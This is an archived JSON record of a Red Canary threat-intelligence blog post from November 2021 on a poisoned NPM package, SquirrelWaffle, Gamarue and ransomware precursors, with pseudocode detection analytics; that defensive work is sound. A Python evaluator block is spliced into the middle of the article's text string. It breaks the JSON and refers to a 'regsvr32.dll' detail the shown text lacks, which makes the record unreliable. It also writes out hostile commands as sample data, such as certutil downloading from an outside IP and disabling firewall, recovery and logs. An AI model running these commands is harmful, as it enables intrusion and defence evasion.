{
	"id": "cc666ad3-7aa0-4d49-a7f4-e6ecb3be0f65",
	"created_at": "2026-04-06T00:10:46.417911Z",
	"updated_at": "2026-04-10T03:21:43.631099Z",
	"deleted_at": null,
	"sha1_hash": "be7215516f2c2196264ea04f98ede4c0ef683780",
	"title": "Intelligence Insights: November 2021",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 109653,
	"plain_text": "Intelligence Insights: November 2021\r\nBy susannah.matt@redcanary.com\r\nArchived: 2026-04-02 10:48:27 UTC\r\n⬆ = trending up from previous month\r\n⬇= trending down from previous month\r\n➡ = no change in rank from previous month\r\n*Denotes a tie\r\nNodeJS with a side of XMRig\r\nThird-party developer libraries and packages are an inescapable part of modern development, and the compromise\r\nof one package can cascade and affect multiple subsequent packages that depend on a single one. While fallout\r\nfrom a compromise of a popular NPM package last month appears relatively limited, the incident was a stark\r\nreminder of how adversaries can exploit organizations’ reliance on trusted development tools. In fact, as we’re\r\ngetting ready to publish this, we’re investigating a new potentially compromised package.\r\nIn October 2021, Red Canary identified a compromised package in NPM, a package distribution and management\r\nutility for JavaScript libraries. The compromised version of the package, ua-parser-js , distributed an XMRig\r\ncryptominer to Windows and Linux systems, as well as an infostealer (likely DanaBot) to Windows systems.\r\nThough the package is downloaded nearly 8 million times each week and the impact could have been widespread,\r\nGitHub quickly issued an advisory warning users that updating that package, or anything that depended on it,\r\nwould initiate malicious behavior on affected systems.\r\nIn this case, we detected the compromised version of ua-parser-js with detectors designed to identify the\r\ncryptominer and infostealer it distributed. Detection opportunities for this category of threat inherently depend on\r\nwhich malware a poisoned package contains.\r\nDetection opportunity: Certutil downloading a file\r\nThis detection opportunity will identify instances of Certificate Authority Utility ( certutil.exe ) with command-line arguments to download an arbitrary file. 
This behavior is commonly observed across multiple threats and is\r\none reliable way adversaries download tools on Windows. Because certutil.exe is a signed Microsoft binary, the download itself rarely trips file-based controls, and legitimate use of the urlcache switch is uncommon enough that every hit deserves review.\r\nprocess == certutil.exe\r\n\u0026\u0026\r\ncommand_line_contains == urlcache\r\nWhen TR delivers SquirrelWaffle, ransomware precursors may soon follow…\r\nhttps://redcanary.com/blog/intelligence-insights-november-2021/\r\nPage 1 of 6\n\nIn late October 2021, Red Canary observed an uptick in detections involving TR (a delivery affiliate) and\r\nSquirrelWaffle. In some cases where we detected TR delivering SquirrelWaffle, we observed additional payloads\r\nand domain reconnaissance beginning within minutes. The short dwell time, combined with recent external\r\nreporting that suggests new TR tradecraft can bypass certain email protections, highlights the need to detect and\r\nrespond to these behaviors in near real time to avoid late-stage activity such as ransomware.\r\nRecent initial access tradecraft may allow adversaries to bypass certain protections provided by\r\nsecure email gateways, increasing the odds that a malicious email is delivered to users’ inboxes. In\r\nearly November, security researchers reported that TR used compromised, on-premises Exchange servers\r\nto send malicious emails to potential victims. As context, successful exploitation of Microsoft Exchange\r\non-premises products enables system access, control of an enterprise email server, and access to\r\nenterprise email accounts. This access effectively allows an adversary to send and receive email from a\r\nvictim’s account with the legitimacy of a trusted, internal sender.\r\nDecreased dwell time underscores the criticality of detecting and responding to ransomware\r\nprecursor activity quickly. In one incident, operators executed Cobalt Strike and BloodHound—hallmark\r\nransomware precursors—only 75 minutes after a user first opened the malicious XLS phishing lure that\r\ninitiated SquirrelWaffle. 
Short dwell times necessitate a clear understanding of adversary behavior and a\r\nrobust toolbox of detection analytics to identify this behavior.\r\nDetection opportunity: Excel spawning Regsvr32\r\nThis detection opportunity will identify instances of regsvr32.exe spawning as a child process of Microsoft\r\nExcel. This behavior is commonly observed in malicious documents with macros or Dynamic Data Exchange\r\n(DDE) execution, notably SquirrelWaffle XLS documents delivered by TR. Excel rarely has a legitimate reason to launch regsvr32.exe, so this analytic produces little noise.\r\nparent_process == excel.exe\r\n\u0026\u0026\r\nprocess == regsvr32.exe\r\nWith a twinkle in its eyes, Gamarue makes the ascent\r\nWhile most of us were reaching for our favorite pumpkin spice latte this past month, Gamarue’s spot in our\r\nrankings suggests that many others opted to reach for their thumb drives instead. Gamarue is a malware family\r\nused as part of a botnet. Some variants of Gamarue are worms and frequently spread via infected USB drives.\r\nGamarue has also been used to spread other malware, steal information, and perform other activities such as click\r\nfraud. This malware was first seen more than 10 years ago and evolved into multiple variants before the operator\r\nwas arrested in 2017.\r\nThough Gamarue is no longer actively developed, it remains a pervasive threat. This highlights the notion that\r\neven if a threat is no longer active, it still warrants consideration from defenders tasked with responding to threats\r\nand building new detection logic.\r\nDetection opportunity: Rundll32 Gamarue CLI\r\nWhile we love to focus on detection opportunities that can identify multiple different threats by identifying\r\nuncommon types of behavior, this detection opportunity focuses on activity that is specific to multiple different\r\nGamarue variants. Below are three example command lines observed from these variants, followed by three regular expressions that match them in the same order.\r\n1. 
\\--_--_--_-__--_-__-__-__-_--__---_--_--_--_.--_--_--_-__--_-__-__-__-_--__---_--_--_--_,LFoRW4dX01fM8FeX\r\n2. \\_--_____--__----__--____---_----.{0B5C7B4B-7F44-02BE-99D4-8C4E124562AD},qwertyuiop123456\r\n3. \\\\\\\\\\\\\\\\\\\\\\~%%@@~%%@@~%%@@~.2,1abcDEfgHIJ2klM4\r\nIn conjunction with this detection opportunity, you may be able to identify the name of an infected thumb drive\r\nthat was plugged into the endpoint by looking for modifications, made at the same time, to UserAssist registry keys whose value names contain the\r\nROT13-encoded string .yax (ROT13 of .lnk). These value names decode to something like\r\nf:\\usb drive (8gb).lnk, which points to a USB drive as the source of the infection.\r\nprocess == rundll32.exe\r\n\u0026\u0026\r\ncommand_line_matches == \\\\[-_.]+\\,\\w+\r\nprocess == rundll32.exe\r\n\u0026\u0026\r\ncommand_line_matches == \\\\[-_]+\\.\\{[A-Z0-9-]{36}\\}\\,\\w+\r\nprocess == rundll32.exe\r\n\u0026\u0026\r\ncommand_line_matches == \\\\+[~$%@]+\\.\\d\\,\\w+\r\nDetection opportunity: Rundll32 spawning Explorer\r\nThis detection opportunity hinges on rundll32.exe spawning explorer.exe, which Red Canary\r\noften observes Gamarue doing in an unusual way.\r\nparent_process == rundll32.exe\r\n\u0026\u0026\r\nprocess == explorer.exe\r\nDetection opportunity: Msiexec No CLI + External Netconn\r\nAs we mentioned in our 2021 Threat Detection Report, Gamarue can still be detected by identifying instances of\r\nthe Windows Installer (msiexec.exe) into which it has been injected. 
Injected instances of msiexec.exe can be identified by\r\ncreating a detection analytic that looks for Msiexec processes that have no associated command-line options and\r\nan external network connection. Both conditions must hold together: legitimate Windows Installer invocations normally carry arguments, and an argument-less instance talking to the internet is the anomaly.\r\nprocess == msiexec.exe\r\n\u0026\u0026\r\ncommand_line == “”\r\n\u0026\u0026\r\nhas_external_netconn?\r\n*Note: Double quotes (“”) within the command line means null.\r\nNew opportunities for detecting ransomware precursors\r\nIn October, we observed Conti and Lockbit affecting multiple customer environments. Fortunately, there are\r\nseveral opportunities to detect precursor behavior for these threats.\r\nConti precursor activity\r\nIn October, we observed several new Qbot TTPs in environments ultimately encrypted with Conti. Notably, we\r\nsaw Qbot inject into Microsoft Synchronization Center (mobsync.exe) and drop Conti DLLs. Additionally, we\r\nsaw Qbot inject into Windows Error Reporting (werfault.exe) with no command-line parameters. Following\r\nthis, the adversary used the xcopy utility to copy the malicious DLLs to different locations on the system. There\r\nare multiple opportunities to detect this activity in your environment:\r\nDetection opportunity: Mobsync creating unusual DLL files\r\nThis detection analytic will identify an unusual file modification stemming from the mobsync.exe process. We\r\ndetermined this file was Conti ransomware in one incident.\r\nprocess == mobsync.exe\r\n\u0026\u0026\r\nfile_modification_create == *.dll\r\nDetection opportunity: Werfault spawning with no command-line parameters\r\nThis detection analytic will identify unusual activity originating from the werfault.exe process. 
Werfault\r\ntypically spawns with command-line parameters when a process crashes, providing the program with input to\r\ncreate an error report, so an instance that starts with an empty command line is worth investigating.\r\nprocess == werfault.exe\r\n\u0026\u0026\r\ncommand_line == “”\r\nDetection opportunity: Xcopy moving files from Group Policy Object (GPO) storage folder\r\nQbot created malicious files within the GPO storage folder during execution. Then, it used the Extended Copy\r\nUtility (xcopy.exe) to copy malicious DLLs, including Conti. The following analytic will identify this activity:\r\nprocess == xcopy.exe\r\n\u0026\u0026\r\ncommand_line_contains == \\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\r\n\u0026\u0026\r\nfile_modification_create == *.dll\r\n*Note: 31B2F340-016D-11D2-945F-00C04FB984F9 is the default domain policy GUID\r\nLockbit precursor activity\r\nDuring a recent Lockbit infection, the operators used PsExec to launch a batch script, which initiated several\r\ncommands designed to prepare the environment for encryption. 
The batch script performed the following actions:\r\nset antivirus exclusion paths for C:\\Programdata\\ and C:\\Windows\\ that allowed malicious binaries to\r\nexist in these paths without interference\r\ndeleted the Windows Defender service\r\ndisabled Windows Defender, User Account Control (UAC), and Windows Recovery\r\nturned off all firewall rules\r\ncleared multiple System and Security logs\r\nThe defense evasion and system recovery commands initiated by the script offer multiple detection opportunities.\r\nDetection opportunity: Disabling Windows Recovery via bcdedit\r\nIn combination with the other commands witnessed in the same timeframe, the use of the Boot Configuration\r\nediting tool (bcdedit.exe) to set specific recovery options helped us identify malicious activity.\r\nprocess == bcdedit.exe\r\n\u0026\u0026\r\nparent_process == ( “rundll32.exe” || “regsvr32.exe” )\r\n\u0026\u0026\r\ncommand_line_contains == “recoveryenabled No”\r\nDetection opportunity: Wevtutil clearing System and Security logs\r\nThe Windows Event Log Utility Tool (wevtutil.exe) process deleted both System and Security event logs. 
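
The analytics in this report are written as vendor-neutral pseudocode. The block below is an added example, not Red Canary's code, that implements every detection opportunity in the report (certutil, Excel spawning regsvr32, the three Gamarue rundll32 patterns, rundll32 spawning explorer, argument-less msiexec with an external connection, mobsync and xcopy DLL creation, argument-less werfault, bcdedit, wevtutil and netsh) as predicates over a minimal process-event record, and runs them over constructed telemetry. The ProcessEvent field names, the host names, paths and the 203.0.113.5 address in the sample events are this example's assumptions; the bcdedit rule assumes the report's "regsvr32.dll" parent meant the regsvr32.exe process, and the wevtutil rule matches cl as a whole token (it abbreviates clear-log) rather than the bare substring in the report. The UserAssist decoder shows the ROT13 step mentioned in the Gamarue section.

```python
"""Reference evaluator for the process-based analytics in this report (added example)."""
import codecs
import re
from dataclasses import dataclass, field

# Default Domain Policy GUID from the xcopy analytic (note the trailing backslash).
DEFAULT_DOMAIN_POLICY = "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\"

# Gamarue rundll32 command-line patterns, transcribed from the three analytics above.
GAMARUE_CLI = [re.compile(p) for p in (
    r"\\[-_.]+\,\w+",
    r"\\[-_]+\.\{[A-Z0-9-]{36}\}\,\w+",
    r"\\+[~$%@]+\.\d\,\w+",
)]


@dataclass
class ProcessEvent:
    """One process-start record; field names are this example's assumed schema."""
    process: str                    # image name, lower-case, e.g. "rundll32.exe"
    command_line: str = ""          # "" means the process started with no arguments
    parent_process: str = ""
    external_netconn: bool = False  # any connection to a non-private address
    files_created: list = field(default_factory=list)


def cl_has(ev, *needles):
    """Case-insensitive command_line_contains; true if any needle is present."""
    return any(n.lower() in ev.command_line.lower() for n in needles)


def creates_dll(ev):
    return any(f.lower().endswith(".dll") for f in ev.files_created)


# Rule name -> predicate; each entry mirrors one "Detection opportunity" in the report.
RULES = {
    "Certutil downloading a file":
        lambda e: e.process == "certutil.exe" and cl_has(e, "urlcache"),
    "Excel spawning Regsvr32":
        lambda e: e.parent_process == "excel.exe" and e.process == "regsvr32.exe",
    "Rundll32 Gamarue CLI":
        lambda e: e.process == "rundll32.exe" and any(p.search(e.command_line) for p in GAMARUE_CLI),
    "Rundll32 spawning Explorer":
        lambda e: e.parent_process == "rundll32.exe" and e.process == "explorer.exe",
    "Msiexec No CLI + External Netconn":
        lambda e: e.process == "msiexec.exe" and e.command_line == "" and e.external_netconn,
    "Mobsync creating unusual DLL files":
        lambda e: e.process == "mobsync.exe" and creates_dll(e),
    "Werfault spawning with no command-line parameters":
        lambda e: e.process == "werfault.exe" and e.command_line == "",
    "Xcopy moving files from GPO storage folder":
        lambda e: e.process == "xcopy.exe" and cl_has(e, DEFAULT_DOMAIN_POLICY) and creates_dll(e),
    # Assumption: the report's "regsvr32.dll" parent means the regsvr32.exe process.
    "Disabling Windows Recovery via bcdedit":
        lambda e: e.process == "bcdedit.exe" and e.parent_process in ("rundll32.exe", "regsvr32.exe")
        and cl_has(e, "recoveryenabled no"),
    # "cl" (short for clear-log) is matched as a whole token, tighter than the bare substring.
    "Wevtutil clearing System and Security logs":
        lambda e: e.process == "wevtutil.exe"
        and re.search(r"\b(cl|clear-log)\b", e.command_line, re.I) is not None
        and cl_has(e, "security", "system"),
    "Netsh turning off all firewall rules":
        lambda e: e.process == "netsh.exe" and cl_has(e, "advfirewall set allprofiles state off"),
}


def evaluate(events):
    """Return {rule name: [matching command lines]} for every rule that fired."""
    hits = {}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(ev.command_line)
    return hits


def decode_userassist(value_name):
    """UserAssist value names are ROT13-encoded; ".yax" is the encoded ".lnk"."""
    return codecs.decode(value_name, "rot_13")


# Constructed telemetry modelled on the behaviours in the report (hosts, paths and the
# 203.0.113.5 address are made up); the last three events are benign look-alikes.
SAMPLE_EVENTS = [
    ProcessEvent("certutil.exe", "certutil -urlcache -split -f http://203.0.113.5/a.dat a.dat", "cmd.exe"),
    ProcessEvent("regsvr32.exe", "regsvr32 -s C:\\ProgramData\\x.dll", "excel.exe"),
    ProcessEvent("rundll32.exe", "rundll32 \\--_--_--_-__--_-__-__-__-_--__---_--_--_--_."
                 "--_--_--_-__--_-__-__-__-_--__---_--_--_--_,LFoRW4dX01fM8FeX", "explorer.exe"),
    ProcessEvent("rundll32.exe", "rundll32 \\_--_____--__----__--____---_----."
                 "{0B5C7B4B-7F44-02BE-99D4-8C4E124562AD},qwertyuiop123456", "explorer.exe"),
    ProcessEvent("rundll32.exe", "rundll32 " + "\\" * 11 + "~%%@@~%%@@~%%@@~.2,1abcDEfgHIJ2klM4", "explorer.exe"),
    ProcessEvent("explorer.exe", "explorer.exe", "rundll32.exe"),
    ProcessEvent("msiexec.exe", "", "services.exe", external_netconn=True),
    ProcessEvent("mobsync.exe", "mobsync.exe", "explorer.exe", files_created=["C:\\ProgramData\\c.dll"]),
    ProcessEvent("werfault.exe", "", "mobsync.exe"),
    ProcessEvent("xcopy.exe", "xcopy /y \\\\dc1\\SYSVOL\\corp.local\\Policies"
                 "\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\c.dll C:\\Users\\Public\\",
                 "cmd.exe", files_created=["C:\\Users\\Public\\c.dll"]),
    ProcessEvent("bcdedit.exe", "bcdedit /set {default} recoveryenabled No", "rundll32.exe"),
    ProcessEvent("wevtutil.exe", "wevtutil cl Security", "cmd.exe"),
    ProcessEvent("netsh.exe", "netsh advfirewall set allprofiles state off", "cmd.exe"),
    ProcessEvent("msiexec.exe", "msiexec /i setup.msi /qn", "services.exe", external_netconn=True),
    ProcessEvent("werfault.exe", "WerFault.exe -u -p 4120 -s 1234", "svchost.exe"),
    ProcessEvent("wevtutil.exe", "wevtutil qe Security /c:5", "cmd.exe"),
]

if __name__ == "__main__":
    for name, matches in evaluate(SAMPLE_EVENTS).items():
        print(f"{name}: {len(matches)} hit(s)")
    print(decode_userassist("s:\\hfo qevir (8to).yax"))  # f:\usb drive (8gb).lnk
```

Running the module fires all eleven rules exactly once each, except the Gamarue rule, which matches all three sample command lines; the three benign events at the end (an msiexec install with arguments, a normal crash-handling werfault, and a wevtutil query) produce nothing. Swap SAMPLE_EVENTS for records from your own EDR export to see which of these analytics need tuning in your environment.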
Clearing the Security or System log with wevtutil is atypical in most environments. Note that cl is shorthand for clear-log; match it as a whole token rather than a bare substring so that unrelated arguments containing those two letters do not trigger the analytic.\r\nprocess == wevtutil.exe\r\n\u0026\u0026\r\ncommand_line_contains == cl\r\n\u0026\u0026\r\n(command_line_contains == Security\r\n||\r\ncommand_line_contains == System )\r\nDetection opportunity: Netsh turning off all firewall rules\r\nSetting all of the system firewall rules to a state of “off” should be considered suspicious and investigated further.\r\nWhile this may be a “normal” system administration function in some cases, it merits close review when observed\r\nwith other activity associated with Lockbit.\r\nprocess == netsh.exe\r\n\u0026\u0026\r\ncommand_line_contains == advfirewall set allprofiles state off\r\nSource: https://redcanary.com/blog/intelligence-insights-november-2021/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://redcanary.com/blog/intelligence-insights-november-2021/"
	],
	"report_names": [
		"intelligence-insights-november-2021"
	],
	"threat_actors": [],
	"ts_created_at": 1775434246,
	"ts_updated_at": 1775791303,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/be7215516f2c2196264ea04f98ede4c0ef683780.pdf",
		"text": "https://archive.orkl.eu/be7215516f2c2196264ea04f98ede4c0ef683780.txt",
		"img": "https://archive.orkl.eu/be7215516f2c2196264ea04f98ede4c0ef683780.jpg"
	}
}